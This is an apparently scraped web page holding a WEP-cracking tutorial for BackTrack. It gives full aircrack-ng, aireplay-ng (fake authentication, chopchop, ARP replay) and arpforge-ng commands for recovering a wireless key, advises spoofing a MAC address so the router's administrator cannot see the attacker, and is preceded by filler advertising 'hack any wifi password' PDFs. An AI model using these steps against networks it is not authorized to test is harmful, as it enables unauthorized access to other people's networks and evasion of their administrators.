Backtrack 5 Wep Cracking Tutorial Pdf

Posted onby
  1. Backtrack 5 Wep Cracking Tutorial Pdf Download
  2. Wep Cracking Xp
Wep cracking download

Backtrack 5 Wep Cracking Tutorial Pdf Download

Tutorial-hack-wpa-backtrack-5-r3.pdf - Tutorial Hack Wpa Backtrack 5 R3 Hacker 100% Pirater WIFI WPA WPA2 PSK BackTrack 5 R3 Tutorial Crack By Cracking WPS. Hack any wifi password WEP WPA Backtrack Crunch Manual - westwindmcadtalk.pdf - 0 downloads.

Wep Cracking Xp

Wep Cracking Tutorial Hi, in this tutorial i will be showing you how to crack wep without any traffic on the network. To use this tutorial you need to have packet injection working with your wireless card, kismet, aircrack suite, arpforge and a small amount of Linux knowledge (to open konsole and put your card into monitor mode) For this tutorial i have use BackTrack (www.remote­ Linux distribution as it contains all the programs and was easy to install packet injection for my driver.
My set­up: Dell Inspiron 1300 with an atheros wireless card running backtrack (i will refer to this as BT), my D­Link DI­524 router which has a 128 Bit encryption and nothing else connected wirelessly. After you boot into BT (or anyother distro your using) put your card into monitor mode. start kismet , we will use kismet to find out the information we will need about the AP we wish to hack kismet will show all the wireless Access Points in range I only have 1 in range (called Crossover) but you may have more around you.
press s then b , this will let you scroll up and down the list till you find the AP you wish to crack then press enter this will give you more information about the access point, make a note of the name of it, the channel its on and the bssid (you can leave kismet open and just come back to it later to get the info) and also make sure its wep as this tutorial is for wep )
we will now run airodump to capture the IV's (data) we will need to crack the wep. open a new konsole and run 'airodump­ng' , this will show you all the possible options you can use with this application,
we only need to capture so we will use the ­w , this is what we will call the file we are capturing and ­c to specify a channel, this will make it easier for us to capture the data from our AP. im going to call my file 'weptutorial' and my channel (the channel kismet shows) is 8 so my command is. we will also need to add the interface to use at the end of the command, iwconfig can show this but hopefully you know, mine is ath1 here is the command i will use: airodump­ng ­w weptutorial ­c 8 ath1 we should see our AP come up and we might have some traffic on it we might not.
i don't have any data on mine (as i have no wireless devices connected to it) Now we are capturing data, we will need about 200 000 to 1 000 000 of these to crack wep. while that's running open a new konsole and now we will speed up the traffic (if you have wireless devices and the data is going up fast enough then you dont need to do this stage) we will now set up a method called chopchop, this is in aireplay­ng (run 'aireplay­ng' like we did airodump­ng to see all the options) and it will capture and data and resend it over and over to make the traffic on the network so we can capture more. the command to do this is: aireplay­ng ­­chopchop ­b 00:0F:3D:3D:94:72 ath1 aireplay­ng ­­chopchop ­b 00:0F:3D:3D:94:72 shows it) ath1
= the program name = the attack we are useing = our AP's MAC address (kismet has this info and airosump also = our network interface
aireplay will keep reading packets till it finds one that it thinks contains an IV (data containing the wep) . If your network hs wireless traffic on it then you should get one soon, if not ( like me) then we can fake authentication with AP and hopefully it will throw a packet or 2 out that we can catch.
to do this we open another konsole and use the aireplay­ng command again but a different attack method aireplay­ng ­­fakeauth 50 ­e Crossover ­a ­00:0F:3D:3D:94:72 ­h 11:22:33:44:55:66 ath1 aireplay­ng = the program name ­­fakeauth 50 = the attack we are using with the delay of 50 ­e Crossover = the name of the AP ­a ­00:0F:3D:3D:94:72 = our AP's MAC address ­h 11:22:33:44:55:66 = a fake mac address for us to attack from so the routers admin cant see our real mac address ath1 = our network interface we should see Sending Authentication Request Authentication successful
after a while the attack will stop but just re­run the command again airodump will also show our new fake mac is connected to the ap Hopefully the chopchop method we started will now catch some data press y to let it send it, it will do something like this screenshot
you will notice airodump has gone crazy too and lots of clients connected to the AP let it run its magic till the chopchop hits 100%
now we have a cap and xor file, we will turn this into a file we can send back to the AP. to do this run an app called arpforge­ng this will edit the capture slightly, im not going to go into detail about this app. arpforge­ng replay_dec­0831­173203.xor 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 arp.cap arpforge­ng replay_dec­0831­173203.xor will be slightly different 1 00:0F:3D:3D:94:72 11:22:33:44:55:66
= the program name = the xor file that was caught by the chopchop method, yours = the type we are using = the AP's mac address = our fake mac = the ip source, this can be anything arp.cap
= the destination , this is the AP's ip = the new capture file name
after this it will say done.
we will now send this modified capture file lots of times, and very fast, this will make the data in airodump go up. aireplay­ng ­­interactive ­r arp.cap ath1 press y when it asks if you want to send this packet
the data in airodump should now be rising very fast
at this stage you can stop the fake auth with ctrl+c. wait till you have about 100 000 before moving on (this may take a while) mine is doing about a hundred a second so make a brew.
when it hits around 100 000 we could start to crack the wep, we will leave the rest running and catching data so it will improve our chances. Cracking Time open a new konsole and run the command 'aircrack­ng' to see all the possible options, we will only be using a few
aircrack­ng ­a 1 ­e Crossover ­b 00:0F:3D:3D:94:72 weptutorial­02.cap aircrack­ng ­a 1 ­e Crossover ­b 00:0F:3D:3D:94:72 weptutorial­02.cap
= the program name = this is to choose what we are cracking 1 = wep, 2 = wpa­psk = the AP name = the ap mac address = this is the capture file that you called when you started airodump, it will prob add ­01 to yours but as i already had one called that it made it ­02, just use tab to find out or look in the folder
It is now testing your keys and hopefully this will find your key (this will also take time, make a sandwich)
remember , the higher the encryption the longer it can take.
if the aircrack fails just restart it and let it catch more data, for this tutorial i needed over 800 000
This key (ModShackHack1) took me 1 hour 20 mins to crack, some may take less time some may take more Hope You Crack Your WEP ­­­­­­­­­­­­­ McScruff